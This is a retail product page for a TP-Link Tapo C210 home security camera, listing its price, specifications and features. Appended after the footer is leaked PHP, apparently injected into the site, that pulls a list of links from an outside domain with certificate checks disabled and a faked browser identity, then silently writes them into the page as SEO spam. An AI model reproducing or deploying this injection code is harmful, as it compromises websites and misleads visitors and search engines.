Sale!

TP-Link Tapo C210 Pan/Tilt Home Security Wi-Fi Camera

Original price was: RM225.00.Current price is: RM180.00.

NETWORK Security 128 bit AES encryption with SSL/TLS Wireless Rate : 11Mbps(802.11b) 54Mbps(802.11g) 150Mbps(802.11n) Frequency : 2.4 GHz Wireless Security WPA/WPA2-PSK ACTIVITY NOTIFICATIONS Input Trigger Motion detection Output Notification : Push notification VIDEO Video Compression : H.264 Frame Rate : 15fps Video Streaming : 1080p SYSTEM Regulatory Certification : FCC, IC, CE, NCC System Requirements iOS 9+, Android 4.4+ ENVIRONMENT Operating Temperature 0°C~40°C (32°F~104°F) Storage Temperature -40°C~70°C (-40°F~158°F) Operating Humidity 10%~90%RH non-condensing Storage Humidity 5%~90%RH non-condensing PACKAGE CONTENTS Package Contents Tapo Pan/Tilt Home Security Wi-Fi Camera Power Adapter Quick Start Guide Mounting Screws Mounting Plate Camera Base HARDWARE Button Reset button Indicator LED System LED Adapter Input 100-240VAC, 50/60Hz, 0.3A Adapter Output 9.0V/0.6A Dimensions (W x D x H) 3.4 x 3.3 x 4.6 in. (86.6 x 85 x 117.7 mm) CAMERA Image Sensor 1/2.9“ Resolution 1080p Full HD Lens F/NO: 2.4; Focal Length: 4mm Night Vision 850 nm IR LED up to 30 ft View Range 360° horizontal, 114° vertical AUDIO Audio Communication 2-way audio Audio Input & Output: Built-in microphone and speaker

High-Definition Video: Records every image in crystal-clear 1080p definition Pan and Tilt: 360º horizontal and 114º vertical range Advanced Night Vision: Provides a visual distance of up to 30 ft Motion Detection and Notifications: Notifies you when the camera detects movement Sound and Light Alarm: Trigger light and sound effects to frighten away unwanted visitors. Two-Way Audio: Enables communication through a built-in microphone and speaker Safe Storage: Locally stores up to 128 GB on a microSD card, equal to 384 hours (16 days) of footage. (Based on laboratory conditions) Voice Control: Free Up Your Hands with Voice Control: Works with the Google Assistant and Amazon Alexa. (Google Assistant and Amazon Alexa are not available in all languages and countries)

Weight 0.3 kg

Reviews

There are no reviews yet.

Be the first to review “TP-Link Tapo C210 Pan/Tilt Home Security Wi-Fi Camera”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }